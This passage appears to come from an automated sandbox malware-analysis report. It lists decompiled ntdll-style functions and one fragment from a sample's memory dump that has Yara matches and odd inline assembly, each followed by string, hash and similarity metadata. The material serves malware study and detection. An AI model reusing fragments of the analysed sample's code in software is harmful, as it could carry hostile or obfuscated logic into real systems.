                                                                      					_t54 = _t46 & _t37;
                                                                      					asm("int1");
                                                                      					asm("std");
                                                                      					_pop(_t46);
                                                                      				}
                                                                      				L4:
                                                                      				_t16 = _t25;
                                                                      				_t25 = _t46;
                                                                      				_t46 = _t16;
                                                                      				if(_t54 < 0) {
                                                                      					asm("pushfd");
                                                                      					goto L6;
                                                                      				}
                                                                      				return _t25;
                                                                      				goto L15;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: AcZ
                                                                      • API String ID: 0-2674484751
                                                                      • Opcode ID: 37def913206e897e81efec025c2d425336062b36028a909ad7cf05debfa3dbe1
                                                                      • Instruction ID: a0fe35deae11a38abcb9d2edc0737224c141f9c1237f2db68068f039ad3435ec
                                                                      • Opcode Fuzzy Hash: 37def913206e897e81efec025c2d425336062b36028a909ad7cf05debfa3dbe1
                                                                      • Instruction Fuzzy Hash: D641FC72625640CBC712DF35C881AE2FB64FF86310F5886AFD9895B182D374A609C7D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00A73540(intOrPtr _a4) {
                                                                      				signed int _v12;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				char _v96;
                                                                      				char _v352;
                                                                      				char _v1072;
                                                                      				intOrPtr _v1140;
                                                                      				intOrPtr _v1148;
                                                                      				char _v1152;
                                                                      				char _v1156;
                                                                      				char _v1160;
                                                                      				char _v1164;
                                                                      				char _v1168;
                                                                      				char* _v1172;
                                                                      				short _v1174;
                                                                      				char _v1176;
                                                                      				char _v1180;
                                                                      				char _v1192;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				short _t41;
                                                                      				short _t42;
                                                                      				intOrPtr _t80;
                                                                      				intOrPtr _t81;
                                                                      				signed int _t82;
                                                                      				void* _t83;
                                                                      
                                                                      				_v12 =  *0xaed360 ^ _t82;
                                                                      				_t41 = 0x14;
                                                                      				_v1176 = _t41;
                                                                      				_t42 = 0x16;
                                                                      				_v1174 = _t42;
                                                                      				_v1164 = 0x100;
                                                                      				_v1172 = L"BinaryHash";
                                                                      				_t81 = E00A30BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                      				if(_t81 < 0) {
                                                                      					L11:
                                                                      					_t75 = _t81;
                                                                      					E00A73706(0, _t81, _t79, _t80);
                                                                      					L12:
                                                                      					if(_a4 != 0xc000047f) {
                                                                      						E00A3FA60( &_v1152, 0, 0x50);
                                                                      						_v1152 = 0x60c201e;
                                                                      						_v1148 = 1;
                                                                      						_v1140 = E00A73540;
                                                                      						E00A3FA60( &_v1072, 0, 0x2cc);
                                                                      						_push( &_v1072);
                                                                      						E00A4DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                      						E00A80C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                      						_push(_v1152);
                                                                      						_push(0xffffffff);
                                                                      						E00A397C0();
                                                                      					}
                                                                      					return E00A3B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                      				}
                                                                      				_t79 =  &_v352;
                                                                      				_t81 = E00A73971(0, _a4,  &_v352,  &_v1156);
                                                                      				if(_t81 < 0) {
                                                                      					goto L11;
                                                                      				}
                                                                      				_t75 = _v1156;
                                                                      				_t79 =  &_v1160;
                                                                      				_t81 = E00A73884(_v1156,  &_v1160,  &_v1168);
                                                                      				if(_t81 >= 0) {
                                                                      					_t80 = _v1160;
                                                                      					E00A3FA60( &_v96, 0, 0x50);
                                                                      					_t83 = _t83 + 0xc;
                                                                      					_push( &_v1180);
                                                                      					_push(0x50);
                                                                      					_push( &_v96);
                                                                      					_push(2);
                                                                      					_push( &_v1176);
                                                                      					_push(_v1156);
                                                                      					_t81 = E00A39650();
                                                                      					if(_t81 >= 0) {
                                                                      						if(_v92 != 3 || _v88 == 0) {
                                                                      							_t81 = 0xc000090b;
                                                                      						}
                                                                      						if(_t81 >= 0) {
                                                                      							_t75 = _a4;
                                                                      							_t79 =  &_v352;
                                                                      							E00A73787(_a4,  &_v352, _t80);
                                                                      						}
                                                                      					}
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                      				}
                                                                      				_push(_v1156);
                                                                      				E00A395D0();
                                                                      				if(_t81 >= 0) {
                                                                      					goto L12;
                                                                      				} else {
                                                                      					goto L11;
                                                                      				}
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: 459964352e82612560aada9ce0016116f078e2364cd86893a7896b014dd8374a
                                                                      • Instruction ID: 8f3afddb02ccd23876394600065ea600ef56dc4965b2942d37072594c5905f4d
                                                                      • Opcode Fuzzy Hash: 459964352e82612560aada9ce0016116f078e2364cd86893a7896b014dd8374a
                                                                      • Instruction Fuzzy Hash: EB4133B2D0152CAADF21DA50CD81FEEB77CAB44714F0185A5BA0DAB241DB709F889F94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00AC05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				char _v32;
                                                                      				signed int _v36;
                                                                      				intOrPtr _v40;
                                                                      				void* __ebx;
                                                                      				void* _t35;
                                                                      				signed int _t42;
                                                                      				char* _t48;
                                                                      				signed int _t59;
                                                                      				signed char _t61;
                                                                      				signed int* _t79;
                                                                      				void* _t88;
                                                                      
                                                                      				_v28 = __edx;
                                                                      				_t79 = __ecx;
                                                                      				if(E00AC07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                      					L13:
                                                                      					_t35 = 0;
                                                                      					L14:
                                                                      					return _t35;
                                                                      				}
                                                                      				_t61 = __ecx[1];
                                                                      				_t59 = __ecx[0xf];
                                                                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                      				_v36 = _a8 << 0xc;
                                                                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                      				asm("sbb esi, esi");
                                                                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                      				if(_t42 != 0) {
                                                                      					_push(0);
                                                                      					_push(0x14);
                                                                      					_push( &_v24);
                                                                      					_push(3);
                                                                      					_push(_t59);
                                                                      					_push(0xffffffff);
                                                                      					if(E00A39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                      						_push(_t61);
                                                                      						E00ABA80D(_t59, 1, _v20, 0);
                                                                      						_t88 = 4;
                                                                      					}
                                                                      				}
                                                                      				_t35 = E00ABA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                      				if(_t35 < 0) {
                                                                      					goto L14;
                                                                      				}
                                                                      				E00AC1293(_t79, _v40, E00AC07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                      				if(E00A17D50() == 0) {
                                                                      					_t48 = 0x7ffe0380;
                                                                      				} else {
                                                                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                      				}
                                                                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                      					E00AB138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                      				}
                                                                      				goto L13;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction ID: eff3529c6364c685614802c3f38032944a9164977f3b06cddc62ed6935007b76
                                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction Fuzzy Hash: 7131F132304305ABE720DF64CD85F9B7BE9EB84754F044229F998DB281E6B0ED14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00A73884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                      				char _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr* _v16;
                                                                      				char* _v20;
                                                                      				short _v22;
                                                                      				char _v24;
                                                                      				intOrPtr _t38;
                                                                      				short _t40;
                                                                      				short _t41;
                                                                      				void* _t44;
                                                                      				intOrPtr _t47;
                                                                      				void* _t48;
                                                                      
                                                                      				_v16 = __edx;
                                                                      				_t40 = 0x14;
                                                                      				_v24 = _t40;
                                                                      				_t41 = 0x16;
                                                                      				_v22 = _t41;
                                                                      				_t38 = 0;
                                                                      				_v12 = __ecx;
                                                                      				_push( &_v8);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(2);
                                                                      				_t43 =  &_v24;
                                                                      				_v20 = L"BinaryName";
                                                                      				_push( &_v24);
                                                                      				_push(__ecx);
                                                                      				_t47 = 0;
                                                                      				_t48 = E00A39650();
                                                                      				if(_t48 >= 0) {
                                                                      					_t48 = 0xc000090b;
                                                                      				}
                                                                      				if(_t48 != 0xc0000023) {
                                                                      					_t44 = 0;
                                                                      					L13:
                                                                      					if(_t48 < 0) {
                                                                      						L16:
                                                                      						if(_t47 != 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                                      						}
                                                                      						L18:
                                                                      						return _t48;
                                                                      					}
                                                                      					 *_v16 = _t38;
                                                                      					 *_a4 = _t47;
                                                                      					goto L18;
                                                                      				}
                                                                      				_t47 = L00A14620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                      				if(_t47 != 0) {
                                                                      					_push( &_v8);
                                                                      					_push(_v8);
                                                                      					_push(_t47);
                                                                      					_push(2);
                                                                      					_push( &_v24);
                                                                      					_push(_v12);
                                                                      					_t48 = E00A39650();
                                                                      					if(_t48 < 0) {
                                                                      						_t44 = 0;
                                                                      						goto L16;
                                                                      					}
                                                                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                                      						_t48 = 0xc000090b;
                                                                      					}
                                                                      					_t44 = 0;
                                                                      					if(_t48 < 0) {
                                                                      						goto L16;
                                                                      					} else {
                                                                      						_t17 = _t47 + 0xc; // 0xc
                                                                      						_t38 = _t17;
                                                                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                                      							_t48 = 0xc000090b;
                                                                      						}
                                                                      						goto L13;
                                                                      					}
                                                                      				}
                                                                      				_t48 = _t48 + 0xfffffff4;
                                                                      				goto L18;
                                                                      			}
















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: 3429ffbaf6bcb1de8b153e7546c5b5cb47275654e543d46026a625be8c83057d
                                                                      • Instruction ID: 62df6e0e0a6b2db1de479f886cfbd0db9bf5ae8c22527be606a5908530f8a6c3
                                                                      • Opcode Fuzzy Hash: 3429ffbaf6bcb1de8b153e7546c5b5cb47275654e543d46026a625be8c83057d
                                                                      • Instruction Fuzzy Hash: 6B31247390151AAFDF15CB59CD61DAFB774EB40720F02C169BA18A7280D7709F00D7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 33%
                                                                      			E00A2D294(void* __ecx, char __edx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				intOrPtr _v64;
                                                                      				char* _v68;
                                                                      				intOrPtr _v72;
                                                                      				char _v76;
                                                                      				signed int _v84;
                                                                      				intOrPtr _v88;
                                                                      				char _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				char _v104;
                                                                      				char _v105;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t35;
                                                                      				char _t38;
                                                                      				signed int _t40;
                                                                      				signed int _t44;
                                                                      				signed int _t52;
                                                                      				void* _t53;
                                                                      				void* _t55;
                                                                      				void* _t61;
                                                                      				intOrPtr _t62;
                                                                      				void* _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t66;
                                                                      
                                                                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                                      				_v8 =  *0xaed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                                      				_v105 = __edx;
                                                                      				_push( &_v92);
                                                                      				_t52 = 0;
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push( &_v104);
                                                                      				_push(0);
                                                                      				_t59 = __ecx;
                                                                      				_t55 = 2;
                                                                      				if(E00A14120(_t55, __ecx) < 0) {
                                                                      					_t35 = 0;
                                                                      					L8:
                                                                      					_pop(_t61);
                                                                      					_pop(_t64);
                                                                      					_pop(_t53);
                                                                      					return E00A3B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                                      				}
                                                                      				_v96 = _v100;
                                                                      				_t38 = _v92;
                                                                      				if(_t38 != 0) {
                                                                      					_v104 = _t38;
                                                                      					_v100 = _v88;
                                                                      					_t40 = _v84;
                                                                      				} else {
                                                                      					_t40 = 0;
                                                                      				}
                                                                      				_v72 = _t40;
                                                                      				_v68 =  &_v104;
                                                                      				_push( &_v52);
                                                                      				_v76 = 0x18;
                                                                      				_push( &_v76);
                                                                      				_v64 = 0x40;
                                                                      				_v60 = _t52;
                                                                      				_v56 = _t52;
                                                                      				_t44 = E00A398D0();
                                                                      				_t62 = _v88;
                                                                      				_t65 = _t44;
                                                                      				if(_t62 != 0) {
                                                                      					asm("lock xadd [edi], eax");
                                                                      					if((_t44 | 0xffffffff) != 0) {
                                                                      						goto L4;
                                                                      					}
                                                                      					_push( *((intOrPtr*)(_t62 + 4)));
                                                                      					E00A395D0();
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                                      					goto L4;
                                                                      				} else {
                                                                      					L4:
                                                                      					L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                                      					if(_t65 >= 0) {
                                                                      						_t52 = 1;
                                                                      					} else {
                                                                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                                      						}
                                                                      					}
                                                                      					_t35 = _t52;
                                                                      					goto L8;
                                                                      				}
                                                                      			}


































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 599cab57b7f9d9c7417ac65020b3c7221f6d251c31ad3fb997b4cba5d897cce1
                                                                      • Instruction ID: 6f0fecf7dc5d8fb371c243c391907bcc416c2042e9aab5f137b7e3b157a4b40c
                                                                      • Opcode Fuzzy Hash: 599cab57b7f9d9c7417ac65020b3c7221f6d251c31ad3fb997b4cba5d897cce1
                                                                      • Instruction Fuzzy Hash: 8A318AB6508315AFC311DF2CD9819ABBBE8EB89754F10092EF9949B252D734DD04CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00A01B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                                      				intOrPtr _v8;
                                                                      				char _v16;
                                                                      				intOrPtr* _t26;
                                                                      				intOrPtr _t29;
                                                                      				void* _t30;
                                                                      				signed int _t31;
                                                                      
                                                                      				_t27 = __ecx;
                                                                      				_t29 = __edx;
                                                                      				_t31 = 0;
                                                                      				_v8 = __edx;
                                                                      				if(__edx == 0) {
                                                                      					L18:
                                                                      					_t30 = 0xc000000d;
                                                                      					goto L12;
                                                                      				} else {
                                                                      					_t26 = _a4;
                                                                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                                      						goto L18;
                                                                      					} else {
                                                                      						E00A3BB40(__ecx,  &_v16, __ecx);
                                                                      						_push(_t26);
                                                                      						_push(0);
                                                                      						_push(0);
                                                                      						_push(_t29);
                                                                      						_push( &_v16);
                                                                      						_t30 = E00A3A9B0();
                                                                      						if(_t30 >= 0) {
                                                                      							_t19 =  *_t26;
                                                                      							if( *_t26 != 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								 *_a8 =  *_a8 & 0;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t30 != 0xc0000023) {
                                                                      								L9:
                                                                      								_push(_t26);
                                                                      								_push( *_t26);
                                                                      								_push(_t31);
                                                                      								_push(_v8);
                                                                      								_push( &_v16);
                                                                      								_t30 = E00A3A9B0();
                                                                      								if(_t30 < 0) {
                                                                      									L12:
                                                                      									if(_t31 != 0) {
                                                                      										L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                                      									}
                                                                      								} else {
                                                                      									 *_a8 = _t31;
                                                                      								}
                                                                      							} else {
                                                                      								_t19 =  *_t26;
                                                                      								if( *_t26 == 0) {
                                                                      									_t31 = 0;
                                                                      								} else {
                                                                      									L7:
                                                                      									_t31 = L00A14620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                                      								}
                                                                      								if(_t31 == 0) {
                                                                      									_t30 = 0xc0000017;
                                                                      								} else {
                                                                      									goto L9;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t30;
                                                                      			}










                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: WindowsExcludedProcs
                                                                      • API String ID: 0-3583428290
                                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction ID: 084ca92c473cbd454cbfc3e36976e7d8ab81c1b8d0325fe10ab738e5508fb4a5
                                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                      • Instruction Fuzzy Hash: 4921F27794022CABEB229B59E940FEFB7BDAF41B51F164425FD049B280D634DC04D7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00A1F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                      				intOrPtr _t13;
                                                                      				intOrPtr _t14;
                                                                      				signed int _t16;
                                                                      				signed char _t17;
                                                                      				intOrPtr _t19;
                                                                      				intOrPtr _t21;
                                                                      				intOrPtr _t23;
                                                                      				intOrPtr* _t25;
                                                                      
                                                                      				_t25 = _a8;
                                                                      				_t17 = __ecx;
                                                                      				if(_t25 == 0) {
                                                                      					_t19 = 0xc00000f2;
                                                                      					L8:
                                                                      					return _t19;
                                                                      				}
                                                                      				if((__ecx & 0xfffffffe) != 0) {
                                                                      					_t19 = 0xc00000ef;
                                                                      					goto L8;
                                                                      				}
                                                                      				_t19 = 0;
                                                                      				 *_t25 = 0;
                                                                      				_t21 = 0;
                                                                      				_t23 = "Actx ";
                                                                      				if(__edx != 0) {
                                                                      					if(__edx == 0xfffffffc) {
                                                                      						L21:
                                                                      						_t21 = 0x200;
                                                                      						L5:
                                                                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                                      						 *_t25 = _t13;
                                                                      						L6:
                                                                      						if(_t13 == 0) {
                                                                      							if((_t17 & 0x00000001) != 0) {
                                                                      								 *_t25 = _t23;
                                                                      							}
                                                                      						}
                                                                      						L7:
                                                                      						goto L8;
                                                                      					}
                                                                      					if(__edx == 0xfffffffd) {
                                                                      						 *_t25 = _t23;
                                                                      						_t13 = _t23;
                                                                      						goto L6;
                                                                      					}
                                                                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                                      					 *_t25 = _t13;
                                                                      					L14:
                                                                      					if(_t21 == 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      				_t14 = _a4;
                                                                      				if(_t14 != 0) {
                                                                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                                      					if(_t16 <= 1) {
                                                                      						_t21 = 0x1f8;
                                                                      						_t13 = 0;
                                                                      						goto L14;
                                                                      					}
                                                                      					if(_t16 == 2) {
                                                                      						goto L21;
                                                                      					}
                                                                      					if(_t16 != 4) {
                                                                      						_t19 = 0xc00000f0;
                                                                      						goto L7;
                                                                      					}
                                                                      					_t13 = 0;
                                                                      					goto L6;
                                                                      				} else {
                                                                      					_t21 = 0x1f8;
                                                                      					goto L5;
                                                                      				}
                                                                      			}












                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx
                                                                      • API String ID: 0-89312691
                                                                      • Opcode ID: 46a06dd15165827d29d8f7106a01c49ca25564cae9225f3ebfd03c04b6fa6972
                                                                      • Instruction ID: 2dee655820c59765eebfe7660967859a280f470c933e47efca7a58fae7535525
                                                                      • Opcode Fuzzy Hash: 46a06dd15165827d29d8f7106a01c49ca25564cae9225f3ebfd03c04b6fa6972
                                                                      • Instruction Fuzzy Hash: 16119D39B046828FEB244F1D89907B672A6AB96724F39453AE466CB3E1DB70CCC18340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00AA8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				intOrPtr _t35;
                                                                      				void* _t41;
                                                                      
                                                                      				_t40 = __esi;
                                                                      				_t39 = __edi;
                                                                      				_t38 = __edx;
                                                                      				_t35 = __ecx;
                                                                      				_t34 = __ebx;
                                                                      				_push(0x74);
                                                                      				_push(0xad0d50);
                                                                      				E00A4D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                                      					E00A85720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                      						asm("int3");
                                                                      						 *(_t41 - 4) = 0xfffffffe;
                                                                      					}
                                                                      				}
                                                                      				 *(_t41 - 4) = 1;
                                                                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                                      				 *((intOrPtr*)(_t41 - 0x64)) = L00A4DEF0;
                                                                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                                      				_push(_t41 - 0x70);
                                                                      				L00A4DEF0(1, _t38);
                                                                      				 *(_t41 - 4) = 0xfffffffe;
                                                                      				return E00A4D130(_t34, _t39, _t40);
                                                                      			}






                                                                      Strings
                                                                      • Critical error detected %lx, xrefs: 00AA8E21
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Critical error detected %lx
                                                                      • API String ID: 0-802127002
                                                                      • Opcode ID: d3b76ba2eb11d9ad6490275517f3e8991a71d5956f2cc109c01e84036d002d97
                                                                      • Instruction ID: 741fac813bfb5c8a92c31c22de74bb1c1a4896f58bd830f90cf630ab4c272fbf
                                                                      • Opcode Fuzzy Hash: d3b76ba2eb11d9ad6490275517f3e8991a71d5956f2cc109c01e84036d002d97
                                                                      • Instruction Fuzzy Hash: 7E118775D00348EBDF24CFA8C60679CBBB0BB45714F20822EE569AB2C2C7384A02CF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00A8FF60
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                      • API String ID: 0-1911121157
                                                                      • Opcode ID: 8bf6250ce0abae77aa0d21b03dd093bac58c24570514080b804c4eca4bae4760
                                                                      • Instruction ID: 55411277fc11443aa9d2c6d47e5ff3b94591bb8a0862faf65aa928f32b49081a
                                                                      • Opcode Fuzzy Hash: 8bf6250ce0abae77aa0d21b03dd093bac58c24570514080b804c4eca4bae4760
                                                                      • Instruction Fuzzy Hash: A811C075A10584EFDB22EB50CE89F9CB7B1FF48714F148464F6096B2A2C7399D90CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 99%
                                                                      			E009FF900(signed int _a4, signed int _a8) {
                                                                      				signed char _v5;
                                                                      				signed char _v6;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed char _t285;
                                                                      				signed int _t289;
                                                                      				signed char _t292;
                                                                      				signed int _t293;
                                                                      				signed char _t295;
                                                                      				signed int _t300;
                                                                      				signed int _t301;
                                                                      				signed char _t306;
                                                                      				signed char _t307;
                                                                      				signed char _t308;
                                                                      				signed int _t310;
                                                                      				signed int _t311;
                                                                      				signed int _t312;
                                                                      				signed char _t314;
                                                                      				signed int _t316;
                                                                      				signed int _t318;
                                                                      				signed int _t319;
                                                                      				signed int _t320;
                                                                      				signed int _t322;
                                                                      				signed int _t323;
                                                                      				signed int _t328;
                                                                      				signed char _t329;
                                                                      				signed int _t337;
                                                                      				signed int _t339;
                                                                      				signed int _t343;
                                                                      				signed int _t345;
                                                                      				signed int _t348;
                                                                      				signed char _t350;
                                                                      				signed int _t351;
                                                                      				signed char _t353;
                                                                      				signed char _t356;
                                                                      				signed int _t357;
                                                                      				signed char _t359;
                                                                      				signed int _t360;
                                                                      				signed char _t363;
                                                                      				signed int _t364;
                                                                      				signed int _t366;
                                                                      				signed int* _t372;
                                                                      				signed char _t373;
                                                                      				signed char _t378;
                                                                      				signed int _t379;
                                                                      				signed int* _t382;
                                                                      				signed int _t383;
                                                                      				signed char _t385;
                                                                      				signed int _t387;
                                                                      				signed int _t388;
                                                                      				signed char _t390;
                                                                      				signed int _t393;
                                                                      				signed int _t395;
                                                                      				signed char _t397;
                                                                      				signed int _t401;
                                                                      				signed int _t405;
                                                                      				signed int _t407;
                                                                      				signed int _t409;
                                                                      				signed int _t410;
                                                                      				signed int _t413;
                                                                      				signed char _t415;
                                                                      				signed int _t416;
                                                                      				signed char _t418;
                                                                      				signed int _t419;
                                                                      				signed int _t421;
                                                                      				signed int _t422;
                                                                      				signed int _t423;
                                                                      				signed char* _t425;
                                                                      				signed char _t426;
                                                                      				signed char _t427;
                                                                      				signed int _t428;
                                                                      				signed int _t429;
                                                                      				signed int _t431;
                                                                      				signed int _t432;
                                                                      				signed int _t434;
                                                                      				signed int _t436;
                                                                      				signed int _t444;
                                                                      				signed int _t445;
                                                                      				signed int _t446;
                                                                      				signed int _t452;
                                                                      				signed int _t454;
                                                                      				signed int _t455;
                                                                      				signed int _t456;
                                                                      				signed int _t457;
                                                                      				signed int _t461;
                                                                      				signed int _t462;
                                                                      				signed int _t464;
                                                                      				signed int _t467;
                                                                      				signed int _t470;
                                                                      				signed int _t474;
                                                                      				signed int _t475;
                                                                      				signed int _t477;
                                                                      				signed int _t481;
                                                                      				signed int _t483;
                                                                      				signed int _t486;
                                                                      				signed int _t487;
                                                                      				signed int _t488;
                                                                      
                                                                      				_t285 =  *(_a4 + 4);
                                                                      				_t444 = _a8;
                                                                      				_t452 =  *_t444;
                                                                      				_t421 = _t285 & 1;
                                                                      				if(_t421 != 0) {
                                                                      					if(_t452 != 0) {
                                                                      						_t452 = _t452 ^ _t444;
                                                                      					}
                                                                      				}
                                                                      				_t393 =  *(_t444 + 4);
                                                                      				if(_t421 != 0) {
